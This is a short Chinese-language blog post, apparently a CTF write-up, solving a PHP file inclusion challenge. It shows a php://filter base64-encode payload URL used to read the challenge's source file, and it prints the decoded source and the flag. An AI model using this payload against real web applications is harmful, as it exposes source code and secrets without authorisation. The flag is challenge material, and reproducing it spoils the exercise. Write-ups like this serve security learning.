Web:BasicFileInclude

BasicFileInclude

根据题目,可以看出是一道php文件包含漏洞.

php文件包含漏洞

  1. https://www.cnblogs.com/R4v3n/articles/9055514.html
  2. https://www.cnblogs.com/vo-ov/p/3745638.html
  3. php伪协议:利用文件包含漏洞:https://blog.csdn.net/qq_41289254/article/details/81388343

题目描述

题目分析

  1. 根据链接的URL:http://web1.blue-whale.me:23338/?page=flag,知道题目的解题类型:利用 php 流 filter: payload:http://web1.blue-whale.me:23338/?page=php://filter/convert.base64-encode/resource=flag
  2. 通过指定末尾的文件,可以读取经 base64 加密后的文件源码,之后再 base64 解码一下就行。
    base64:aGEgaGE/IHlvdSB3YW50IGZsYWc/IGZsYWcgaXMgaGVyZTw/cGhwDQovLyB0cnkgdG8gcmVhZCB0aGlzIHNvdXJjZSBjb2RlDQovLyRmbGFnID0gJ2ZsYWd7cmVhbGx5X2Jhc2ljX3NraWxsX3dlYl9kb2dfc2hvdWxkX2tub3d9JzsNCj8+LCBidXQgZG9uJ3QgbGV0IHlvdSBzZWUhDQo=
    解码:ha ha? you want flag? flag is here<?php // try to read this source code //$flag = 'flag{really_basic_skill_web_dog_should_know}'; ?>, but don't let you see!
  3. 这里就是在文件中包含了php代码。

本文标题:Web:BasicFileInclude

文章作者:HANqd

发布时间:2019-04-16, 11:21:15

最后更新:2019-04-16, 11:22:16

原始链接:https://hanqd.github.io/2019/04/16/php3/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. BasicFileInclude
    1. 1.1. php文件包含漏洞
    2. 1.2. 题目描述
    3. 1.3. 题目分析